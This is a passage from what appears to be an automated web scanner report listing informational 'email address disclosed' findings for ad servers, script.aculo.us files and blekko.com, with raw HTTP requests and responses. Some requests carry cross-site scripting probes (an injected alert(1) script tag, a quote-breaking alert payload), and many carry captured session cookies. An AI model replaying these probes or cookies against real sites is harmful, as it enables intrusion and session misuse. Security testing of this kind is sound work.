Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@2@4d49741a@www.ehow.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:13:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@3@4d4974ad@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.12. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d49741a@www.ehow.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:11:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@2@4d49741a@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.13. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d49783c@www.ehow.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:29:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@2@4d49783c@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.14. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d49757a@www.ehow.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:17:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@a@4d49757a@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.15. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4977f7@www.ehow.com

Request

Response

21.16. http://ads.adbrite.com/adserver/vdi/762701 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/762701

Issue detail

The following email address was disclosed in the response:

4d4974ee@www.ehow.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:14:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@7@4d4974ee@www.ehow.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

21.17. https://ads.pof.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

Response

21.18. https://ads.pof.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

Response

21.19. https://ads.pof.com/Default.aspx/%22ns=%22alert(0x000176) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/%22ns=%22alert(0x000176)

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

Response

21.20. https://ads.pof.com/Default.aspx/assets/png/create_your_first_ad.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ads.pof.com
Path:	/Default.aspx/assets/png/create_your_first_ad.png

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

Response

21.21. http://ads1.msn.com/library/dap.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/library/dap.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dap.js HTTP/1.1
Host: ads1.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?6e5ec%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef4e8bec2fdd=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F
If-Modified-Since: Fri, 17 Sep 2010 17:58:18 GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=172800
Date: Wed, 02 Feb 2011 21:46:49 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 01 Feb 2011 21:48:42 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Fri, 04 Feb 2011 00:21:45 GMT
X-WR-MODIFICATION: Content-Length
Connection: keep-alive
Content-Length: 13792

var _daprr=new Array('http://rad.msn.com/ADSAdClient31.dll?GetSAd=','http://a.rad.msn.com/ADSAdClient31.dll?GetSAd=', 'http://b.rad.msn.com/ADSAdClient31.dll?GetSAd=');var _daprs=0;var _daplp='http:/
...[SNIP]...

21.22. http://ads1.msn.com/library/dapbeta.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads1.msn.com
Path:	/library/dapbeta.js

Issue detail

The following email address was disclosed in the response:

inet@microsoft.com

Request

GET /library/dapbeta.js HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
If-Modified-Since: Tue, 19 Oct 2010 21:15:54 GMT
Host: ads1.msn.com
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:09 GMT
Expires: Wed, 12 Jan 2011 11:07:52 GMT
Last-Modified: Tue, 19 Oct 2010 21:15:54 GMT
Cache-Control: max-age=43200
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Vary: Accept-Encoding
X-WR-MODIFICATION: Content-Length
Content-Length: 3737

function verifyDapResize(a){var b=dapMgr.adCont;!b[a].resizeCalled&&dap_Resize(b[a].ifrmid,b[a].w,b[a].h)}function dap_Resize(a,c,b){document.getElementById(a).width=c;document.getElementById(a).heigh
...[SNIP]...

21.23. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/scriptaculous/1.8.2/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /ajax/libs/scriptaculous/1.8.2/controls.js HTTP/1.1
Host: ajax.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.stocktrader.org.uk/remote2/ST1-2.php?ws=http://www.ligattsecurity.com/&wt=10000000000000000&w=200&h=250&bgc=11175E&tf=tahoma&tfs=17&tc=ffffff&tbc=11175E&f=tahoma&fc=ffffff&fs=11&tz=-5&cw=LGTT.PK&c=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Tue, 09 Feb 2010 23:05:02 GMT
Date: Mon, 31 Jan 2011 19:24:20 GMT
Expires: Tue, 31 Jan 2012 19:24:20 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 72699
Content-Length: 34787

// script.aculo.us controls.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

21.24. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/ajax/libs/scriptaculous/1.8.2/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

GET /ajax/libs/scriptaculous/1.8.2/dragdrop.js HTTP/1.1
Host: ajax.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.stocktrader.org.uk/remote2/ST1-2.php?ws=http://www.ligattsecurity.com/&wt=10000000000000000&w=200&h=250&bgc=11175E&tf=tahoma&tfs=17&tc=ffffff&tbc=11175E&f=tahoma&fc=ffffff&fs=11&tz=-5&cw=LGTT.PK&c=US
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Tue, 09 Feb 2010 23:05:02 GMT
Date: Mon, 31 Jan 2011 19:25:21 GMT
Expires: Tue, 31 Jan 2012 19:25:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Cache-Control: public, max-age=31536000
Age: 72638
Content-Length: 31174

// script.aculo.us dragdrop.js v1.8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...

21.25. http://blekko.com/s/images/wait24trans.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/s/images/wait24trans.gif

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /s/images/wait24trans.gif HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Thu, 03 Feb 2011 06:48:47 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.26. http://blekko.com/s/theme19/imgs/plugs/likes_popup2.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/s/theme19/imgs/plugs/likes_popup2.png

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /s/theme19/imgs/plugs/likes_popup2.png HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.27. http://blekko.com/s/theme19/imgs/plugs/mobileapp.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/s/theme19/imgs/plugs/mobileapp.png

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /s/theme19/imgs/plugs/mobileapp.png HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.28. http://blekko.com/ws/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/ HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:01 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.29. http://blekko.com/ws/+/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/about

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/about HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:42 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.30. http://blekko.com/ws/+/adsense=4433512740400217 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=4433512740400217

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=4433512740400217 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:40 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.31. http://blekko.com/ws/+/adsense=4433512740400217+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=4433512740400217+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=4433512740400217+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:00 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.32. http://blekko.com/ws/+/adsense=6316080006029695+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=6316080006029695+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=6316080006029695+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:13 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.33. http://blekko.com/ws/+/adsense=7542722322890062 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=7542722322890062

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=7542722322890062 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:53 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.34. http://blekko.com/ws/+/adsense=7542722322890062+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=7542722322890062+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=7542722322890062+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:25 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.35. http://blekko.com/ws/+/adsense=7760089209341419 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=7760089209341419

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=7760089209341419 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:34 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.36. http://blekko.com/ws/+/adsense=7760089209341419+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=7760089209341419+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=7760089209341419+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

21.37. http://blekko.com/ws/+/adsense=9396229490951644 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=9396229490951644

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:38:29 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.38. http://blekko.com/ws/+/adsense=9396229490951644+/cwe-79 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/adsense=9396229490951644+/cwe-79

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/adsense=9396229490951644+/cwe-79 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:54 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.39. http://blekko.com/ws/+/blekkoapp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/blekkoapp

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/blekkoapp HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:50 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.40. http://blekko.com/ws/+/blekkojobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/blekkojobs

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/blekkojobs HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:46 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.41. http://blekko.com/ws/+/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/contact

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/contact HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:41 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.42. http://blekko.com/ws/+/faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blekko.com
Path:	/ws/+/faq

Issue detail

The following email address was disclosed in the response:

support@blekko.com

Request

GET /ws/+/faq HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 509
Server: nginx
Date: Thu, 03 Feb 2011 06:57:18 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...
<a href="mailto:support@blekko.com">support@blekko.com</a>
...[SNIP]...

21.43. http://blekko.com/ws/+/help previous next

Summary

